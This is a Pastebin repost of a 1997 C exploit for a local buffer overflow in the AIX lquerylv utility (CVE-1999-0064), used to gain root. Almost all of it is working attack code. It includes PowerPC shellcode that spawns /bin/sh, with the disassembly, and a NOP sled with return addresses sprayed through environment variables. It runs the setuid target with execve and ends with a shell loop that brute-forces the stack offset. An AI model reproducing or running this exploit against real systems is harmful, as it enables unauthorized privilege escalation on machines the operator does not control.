Advertisement
FlyFar

AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation - CVE-1999-0064

May 17th, 2024
1,578
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.98 KB | Cybersecurity | 0 0
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4.  
  5.  
  6. char prog[100]="/usr/sbin/lquerylv";
  7. char prog2[30]="lquerylv";
  8. extern int execv();
  9.  
  10. char *createvar(char *name,char *value)
  11. {
  12. char *c;
  13. int l;
  14. l=strlen(name)+strlen(value)+4;
  15. if (! (c=malloc(l))) {perror("error allocating");exit(2);};
  16. strcpy(c,name);
  17. strcat(c,"=");
  18. strcat(c,value);
  19. putenv(c);
  20. return c;
  21. }
  22.  
  23. /*The program*/
  24. main(int argc,char **argv,char **env)
  25. {
  26. /*The code*/
  27. unsigned int code[]={
  28. 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  29. 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  30. 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  31. 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  32. 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  33. 0x7c0903a6 , 0x4e800420, 0x0
  34. };
  35. /* disassembly
  36. 7c0802a6        mfspr   r0,LR
  37. 9421fbb0        stu     SP,-1104(SP) --get stack
  38. 90010458        st      r0,1112(SP)
  39. 3c60f019        cau     r3,r0,0xf019 --CTR
  40. 60632c48        lis     r3,r3,11336  --CTR
  41. 90610440        st      r3,1088(SP)
  42. 3c60d002        cau     r3,r0,0xd002 --TOC
  43. 60634c0c        lis     r3,r3,19468  --TOC
  44. 90610444        st      r3,1092(SP)
  45. 3c602f62        cau     r3,r0,0x2f62 --'/bin/sh\x01'
  46. 6063696e        lis     r3,r3,26990
  47. 90610438        st      r3,1080(SP)
  48. 3c602f73        cau     r3,r0,0x2f73
  49. 60636801        lis     r3,r3,26625
  50. 3863ffff        addi    r3,r3,-1
  51. 9061043c        st      r3,1084(SP) --terminate with 0
  52. 30610438        lis     r3,SP,1080
  53. 7c842278        xor     r4,r4,r4    --argv=NULL
  54. 80410440        lwz     RTOC,1088(SP)
  55. 80010444        lwz     r0,1092(SP) --jump
  56. 7c0903a6        mtspr   CTR,r0
  57. 4e800420        bctr              --jump
  58. */
  59.  
  60. #define MAXBUF 600
  61. unsigned int buf[MAXBUF];
  62. unsigned int frame[MAXBUF];
  63. unsigned int i,nop,mn;
  64. int max;
  65. int QUIET=0;
  66. int dobuf=0;
  67. unsigned int toc;
  68. unsigned int eco;
  69. unsigned int *pt;
  70. char *t;
  71. int ch;
  72. unsigned int reta; /* return address */
  73. int corr=4600;
  74. char *args[4];
  75. char *arg1="-L";
  76. char *newenv[8];
  77. int startwith=0;
  78.  
  79. mn=100;
  80. max=280;
  81.  
  82. if (argc>1)
  83.         corr = atoi(argv[1]);
  84.  
  85. pt=(unsigned *) &execv;
  86. toc=*(pt+1);
  87. eco=*pt;
  88.  
  89. if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
  90. {
  91.         perror("Bad parameters");
  92.         exit(1);
  93. }
  94.  
  95. #define OO 7
  96. *((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
  97. *((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
  98. *((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
  99. *((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
  100. 0x0000ffff);
  101.  
  102. reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
  103.  
  104. for(nop=0;nop<mn;nop++)
  105.  buf[nop]=startwith ? reta : 0x4ffffb82;        /*NOP*/
  106. strcpy((char*)&buf[nop],(char*)&code);
  107. i=nop+strlen( (char*) &code)/4-1;
  108.  
  109. if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
  110.         || !(reta && 0xff000000))
  111. {
  112. perror("Return address has zero");exit(5);
  113. }
  114.  
  115. while(i++<max)
  116.  buf[i]=reta;
  117. buf[i]=0;
  118.  
  119. for(i=0;i<max-1;i++)
  120.  frame[i]=reta;
  121. frame[i]=0;
  122.  
  123. if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
  124.  
  125. /* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
  126. newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
  127. newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
  128. newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
  129. newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
  130.  
  131.  
  132. newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
  133. newenv[5]=NULL;
  134.  
  135. args[0]=prog2;
  136. args[1]=arg1;
  137. args[2]=(char*)&frame[0]; /* Just frame pointers */
  138. puts("Start...");/*Here we go*/
  139. execve(prog,args,newenv);
  140. perror("Error executing execve \n");
  141. /*      Georgi Guninski
  142.         guninski@hotmail.com
  143.         sgg@vmei.acad.bg
  144.         guninski@linux2.vmei.acad.bg
  145.         http://www.geocities.com/ResearchTriangle/1711
  146. */
  147. }
  148. /*
  149. ----------cut here---------
  150. ----------sometimes this helps-----------------
  151. #!/bin/ksh
  152. L=100
  153. O=40
  154. while [ $L -lt 12000 ]
  155. do
  156. echo $L
  157. L=`expr $L + 42`
  158. ./a.out $L
  159. done */
  160.  
  161. // milw0rm.com [1997-05-26]
  162.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement